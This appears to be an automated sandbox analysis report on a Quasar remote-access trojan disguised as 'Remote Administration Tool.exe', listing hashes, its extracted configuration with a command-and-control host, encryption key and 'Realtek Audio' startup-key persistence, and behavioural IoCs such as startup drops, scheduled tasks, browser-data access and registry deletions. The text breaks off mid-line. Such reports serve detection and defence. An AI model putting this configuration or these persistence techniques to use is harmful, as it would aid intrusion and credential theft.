Analysis
-
max time kernel
750s -
max time network
757s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
04-08-2023 22:31
Behavioral task
behavioral1
Sample
Remote Administration Tool.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
Remote Administration Tool.exe
Resource
win10v2004-20230703-en
General
-
Target
Remote Administration Tool.exe
-
Size
3.1MB
-
MD5
73dcb3b3b59192b45f1975fc7a8e9d08
-
SHA1
5fdaa30f92acc816c3b43db076f98c91391a3588
-
SHA256
d580d7cf10f4eb1cd8aa0cbf80c30f832a0f052c33cdc3d1cf3710e6b67528a8
-
SHA512
adce937291bf7c34e255d4b9785884552828cc07fc00b78842402e72e5addb31f61265c2aec593f5bdc1f041bdafd93758bfbc102c8ab25e4bbc7819c16aacc7
-
SSDEEP
49152:zv2I22SsaNYfdPBldt698dBcjHPby3EfsAk/WPPoGdfTHHB72eh2NT:zvb22SsaNYfdPBldt6+dBcjHPby2H
Malware Config
Extracted
quasar
1.4.1
Infected
AmirAmir8565-20409.portmap.host:20409
ff410ede-beff-4970-8e12-7d251057f1fd
-
encryption_key
1B172706DED462B59F2A5056AB06A8DD1EE8491B
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Realtek Audio
-
subdirectory
SubDir
Signatures
-
Quasar payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/4156-133-0x0000000000570000-0x0000000000894000-memory.dmp family_quasar C:\Users\Admin\AppData\Roaming\SubDir\Client.exe family_quasar C:\Users\Admin\AppData\Roaming\SubDir\Client.exe family_quasar -
Downloads MZ/PE file
-
Drops startup file 4 IoCs
Processes:
LtVS7J0Z7Ji8.execmd.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LtVS7J0Z7Ji8.exe LtVS7J0Z7Ji8.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LtVS7J0Z7Ji8.exe LtVS7J0Z7Ji8.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\disabler.cmd cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\disabler.cmd cmd.exe -
Executes dropped EXE 3 IoCs
Processes:
Client.exeLtVS7J0Z7Ji8.exeLtVS7J0Z7Ji8.exepid process 4592 Client.exe 4404 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe -
Loads dropped DLL 48 IoCs
Processes:
LtVS7J0Z7Ji8.exepid process 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe 3228 LtVS7J0Z7Ji8.exe -
Modifies system executable filetype association 2 TTPs 3 IoCs
Processes:
Client.exedescription ioc process Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\lnkfile\shellex\ContextMenuHandlers Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\lnkfile\shellex Client.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Registers COM server for autorun 1 TTPs 64 IoCs
Processes:
Client.exedescription ioc process Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0013-0001-0086-ABCDEFFEDCBB}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0014-0002-0030-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0018-ABCDEFFEDCBB}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0052-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0013-0001-0050-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0013-0001-0057-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0064-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0028-ABCDEFFEDCBC}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0072-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0002-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0059-ABCDEFFEDCBB}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0054-ABCDEFFEDCBC}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0077-ABCDEFFEDCBB}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0013-ABCDEFFEDCBB}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0004-ABCDEFFEDCBC}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0081-ABCDEFFEDCBC}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0015-ABCDEFFEDCBC}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0028-ABCDEFFEDCBB}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0012-ABCDEFFEDCBC}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0013-0001-0009-ABCDEFFEDCBB}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0022-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0069-ABCDEFFEDCBC}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0053-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0013-0001-0051-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0065-ABCDEFFEDCBC}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0058-ABCDEFFEDCBB}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBB}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0019-ABCDEFFEDCBB}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0025-ABCDEFFEDCBB}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0014-0000-0003-ABCDEFFEDCBB}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0012-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0003-ABCDEFFEDCBC}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0008-ABCDEFFEDCBC}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0069-ABCDEFFEDCBB}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0031-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0065-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0013-0001-0068-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0095-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0074-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0091-ABCDEFFEDCBB}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0011-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0038-ABCDEFFEDCBB}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0043-ABCDEFFEDCBB}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0085-ABCDEFFEDCBC}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0065-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0070-ABCDEFFEDCBB}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0010-ABCDEFFEDCBC}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0014-ABCDEFFEDCBB}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0060-ABCDEFFEDCBC}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0079-ABCDEFFEDCBC}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0031-ABCDEFFEDCBC}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0054-ABCDEFFEDCBC}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0013-0001-0066-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0014-0002-0033-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0014-ABCDEFFEDCBC}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0063-ABCDEFFEDCBC}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0064-ABCDEFFEDCBC}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0007-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0047-ABCDEFFEDCBB}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0029-ABCDEFFEDCBB}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0014-0002-0012-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0014-0002-FFFF-ABCDEFFEDCBA}\InprocServer32 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0042-ABCDEFFEDCBA}\InprocServer32 Client.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
unregmp2.exedescription ioc process File opened (read-only) \??\V: unregmp2.exe File opened (read-only) \??\W: unregmp2.exe File opened (read-only) \??\I: unregmp2.exe File opened (read-only) \??\K: unregmp2.exe File opened (read-only) \??\T: unregmp2.exe File opened (read-only) \??\P: unregmp2.exe File opened (read-only) \??\S: unregmp2.exe File opened (read-only) \??\Z: unregmp2.exe File opened (read-only) \??\E: unregmp2.exe File opened (read-only) \??\G: unregmp2.exe File opened (read-only) \??\O: unregmp2.exe File opened (read-only) \??\N: unregmp2.exe File opened (read-only) \??\R: unregmp2.exe File opened (read-only) \??\X: unregmp2.exe File opened (read-only) \??\Y: unregmp2.exe File opened (read-only) \??\B: unregmp2.exe File opened (read-only) \??\H: unregmp2.exe File opened (read-only) \??\J: unregmp2.exe File opened (read-only) \??\Q: unregmp2.exe File opened (read-only) \??\U: unregmp2.exe File opened (read-only) \??\A: unregmp2.exe File opened (read-only) \??\L: unregmp2.exe File opened (read-only) \??\M: unregmp2.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 53 ipinfo.io 54 ipinfo.io -
Detects Pyinstaller 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\LtVS7J0Z7Ji8.exe pyinstaller C:\Users\Admin\AppData\Local\Temp\LtVS7J0Z7Ji8.exe pyinstaller C:\Users\Admin\AppData\Local\Temp\LtVS7J0Z7Ji8.exe pyinstaller C:\Users\Admin\AppData\Local\Temp\LtVS7J0Z7Ji8.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1660 388 WerFault.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 4976 schtasks.exe 796 schtasks.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Modifies Control Panel 60 IoCs
Processes:
Client.exedescription ioc process Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Accessibility\Keyboard Response Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Input Method\Hot Keys\00000070 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Accessibility\HighContrast Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\International Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Keyboard Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Mouse Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Accessibility\On Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Accessibility\StickyKeys Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Accessibility\Blind Access Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Accessibility\ShowSounds Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Accessibility\SlateLaunch Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Appearance\New Schemes Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Colors Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Desktop\Colors Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Desktop\MuiCached Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\International\Geo Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\International\User Profile System Backup Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Accessibility\MouseKeys Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Accessibility\SoundSentry Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Bluetooth\FileSquirtInstalled Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Input Method\Hot Keys\00000012 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\International\User Profile\en-US Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\PowerCfg\PowerPolicies\3 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Sound Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Accessibility\AudioDescription Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Input Method\Hot Keys\00000010 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Input Method\Hot Keys\00000071 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Input Method\Hot Keys Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\International\User Profile System Backup\en-US Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Desktop Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Input Method\Hot Keys\00000203 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Personalization\Desktop Slideshow Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Quick Actions Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Input Method\Hot Keys\00000072 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Input Method\Hot Keys\00000200 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\PowerCfg\PowerPolicies\1 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\PowerCfg\PowerPolicies\5 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Accessibility\ToggleKeys Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Input Method\Hot Keys\00000104 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Input Method\Hot Keys\00000202 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Cursors Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\PowerCfg\PowerPolicies\0 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Appearance Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Desktop\WindowMetrics Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Input Method\Hot Keys\00000011 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\International\User Profile Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Accessibility\TimeOut Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Bluetooth Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Input Method Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Personalization Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\PowerCfg\PowerPolicies\4 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\PowerCfg\PowerPolicies Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Accessibility Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\PowerCfg Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Quick Actions\Pinned Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\PowerCfg\PowerPolicies\2 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Appearance\Schemes Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Input Method\Hot Keys\00000201 Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\PowerCfg\GlobalPowerPolicy Client.exe Key deleted \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\Accessibility\Keyboard Preference Client.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
Client.exedwm.exedescription ioc process Key deleted \REGISTRY\USER\S-1-5-19\AppEvents\Schemes\Apps\.Default\WindowsLogon\.Default Client.exe Key deleted \REGISTRY\USER\S-1-5-19\AppEvents\Schemes\Apps\sapisvr\PanelSound Client.exe Key deleted \REGISTRY\USER\S-1-5-20\Keyboard Layout Client.exe Key deleted \REGISTRY\USER\S-1-5-19\AppEvents\EventLabels\Navigating Client.exe Key deleted \REGISTRY\USER\S-1-5-19\AppEvents\EventLabels\Open Client.exe Key deleted \REGISTRY\USER\S-1-5-19\AppEvents\Schemes\Apps\.Default\.Default\.Current Client.exe Key deleted \REGISTRY\USER\S-1-5-19\Network Client.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri\1d5acddeb9898a7 Client.exe Key deleted \REGISTRY\USER\S-1-5-20\AppEvents\Schemes\Apps\.Default\Close Client.exe Key deleted \REGISTRY\USER\S-1-5-19\Control Panel\PowerCfg\PowerPolicies\3 Client.exe Key deleted \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\WindowMetrics Client.exe Key deleted \REGISTRY\USER\.DEFAULT\Control Panel\International\Geo Client.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe%5Cresources.pri Client.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-19 Client.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.LockApp_cw5n1h2txyewy%5Cresources.pri\1d7e5367a448984 Client.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Search_cw5n1h2txyewy%5Cresources.pri Client.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local 